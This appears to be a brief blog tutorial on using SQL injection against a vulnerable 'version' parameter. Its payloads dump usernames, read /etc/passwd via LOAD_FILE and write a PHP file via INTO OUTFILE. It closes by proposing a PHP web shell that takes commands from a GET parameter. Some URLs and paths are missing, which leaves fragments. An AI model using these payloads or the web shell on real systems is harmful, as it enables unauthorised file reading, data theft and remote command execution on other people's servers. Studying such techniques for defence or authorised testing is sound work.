File Write via SQL

Hi folks,

you probably know SQL injections. SQL injections provide a lot of fun concerning database manipulation. But it is also a great way to read and write files.

Consider the website In our example, the application provides a version parameter that is susceptible to SQL injections. As consequence, an attacker is enabled to do database voodoo like' UNION ALL SELECT NULL,NULL,username FROM users--

This should return a list of user names that are stored in the table users. If you have no idea how this actually works, I recommend reading some SQL injection literature given in Further Reading.

Reading Files

The following listing is slightly edited to give us the content of the file /etc/passwd. This is done via LOAD_FILE. Note, this only works with files readable for the database user.' UNION ALL SELECT NULL,NULL,LOAD_FILE("/etc/passwd") FROM users--

Writing Files

After reading files, let's go ahead writing them. The listing has changed once more to write to an outfile via the SELECT ... INTO OUTFILE statement.' UNION ALL SELECT NULL,NULL,"<?php echo "hello world"; ?> INTO OUTFLIE "/var/www/vhosts/"--

The fun part is, that our php statement is written into /var/vhosts/ Writing files is a big win for every adversary. A possible next step is to write <? system($_GET['cmd']); ?> into a file readable for the web server. In case of success, the attacker has a nice remote shell by using -l.

Further Reading